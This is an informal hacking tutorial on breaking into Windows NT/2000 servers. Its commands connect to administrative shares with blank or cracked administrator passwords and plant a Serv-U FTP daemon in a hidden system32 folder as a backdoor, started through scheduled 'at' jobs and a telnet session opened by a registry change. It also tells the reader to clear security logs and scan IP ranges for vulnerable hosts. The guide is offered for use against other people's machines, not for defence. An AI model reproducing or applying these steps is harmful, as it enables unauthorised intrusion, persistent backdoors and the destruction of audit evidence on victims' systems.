NT Pass Hacking.

Again
Things you need !
1.Proxy
3.Flash FXP
4.Serv-u
goto start menu and type in start > run: \\ip\c$
where IP is the ip of the SERVER your tryig to hack!
and when it asks you for the pass, put it in
also...one more thing
the account type has to be an admin of some type
guest accts dont work
Configure your serv-u files BEFORE UPLOAD!
2.
ok it looks like windows explorer, right so now you can drag and drop
your ftp files *im using serv-u*
3: Here's the files need to upload
ServUDaemon.exe
ServUDaemon.ini
ServUCert.key
ServUCert.crt
libeay32.dll
ssleay32.dll
TzoLibr.dll
4.make a dir somewhere in winnt/system32 DIR make sure not to name
it anytihng obvious *cause they will catch it*
5.open Dos and type "Net Time \\IP" .WITHOUT "
6.Once it gives you the time on the machine go 3 minutes ahead and type at \\IP
TIME "PATH"
This time WITH THE BRACKETS EX: at \\255.255.255.255 4:50pm "C:\winnt\system32\s
upport\servudaemon.exe"
7.IT should start up servu daemon at this time
8.log on using your FTP program using the ip of the server and the port you defi
ned!
9.Its all easy from now create accounts editing the servudaemon.ini or remote ad
ministration.
10. GooD LuCk
NT-Pass Hacking
NTPass tutorial
1: Upload the Servu files
A. Start execute: \\ipaddress\c$
B. Insert username and password if nessesary
C. Copy paste the Servu files in c:\winnt\system32
2: Connecting to the IPC$
A. Open a DOS window
B. Type in: net use \\ipaddress\ipc$ "" /user:"administrator"
C. If you connect to the system, it will say, " The command was completed succes
sfully "
D. If it says, bad username or password, Try running PQWak.exe to crack the share
name password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
E. Users usually have only one password for everything. So try the c$ share pass
as the administrator password to connect to the IPC$
3: Connecting using Computer Management
A. Open Computer Management.
B. Click Action, then Connect to Another Computer
C. Type in the IP address.
4. Disable NTLM
A. Open regedit
B. Connect to the following registry key:
HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0->NTLM
C. Set the value data from (2) to (1)
D. That will enable login to the telnet server without being connected to the IP
C$ or a trusted domain.
5. Starting the Telnet service
A. In Computer Management, click Services and Applications
B. Click Services
C. Right click on the Telnet Service and open Properties.
D. Set the service to Automatic, and start the service.
6: Connecting using Telnet and starting Servu
A. Open a dos window, and type the following: telnet IPaddress
B. If prompted to type a username and password, type Administrator with no passw
ord.
C. Type in: winnt\system32\servu.exe /h /u
7: Shut down IPC$ connection
A. Open a dos window, and type the following: Net use \\ipaddress\ipc$ /delete
B. While logged on to Computer Management. Check if the Security Logs are being
audited in Event Viewer. If they are, clear them.
8: Scanning for open Win2k systems
A. Open SuperScan 2.05 (Port scanner)
B. Select a IP range
C. Check "Only scan responsive pings" and "All selected ports in list"
D. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
E. When a system with both Netbios and BlackJack is found, open NetBrute, and sc
an that IP to see if there is an IPC$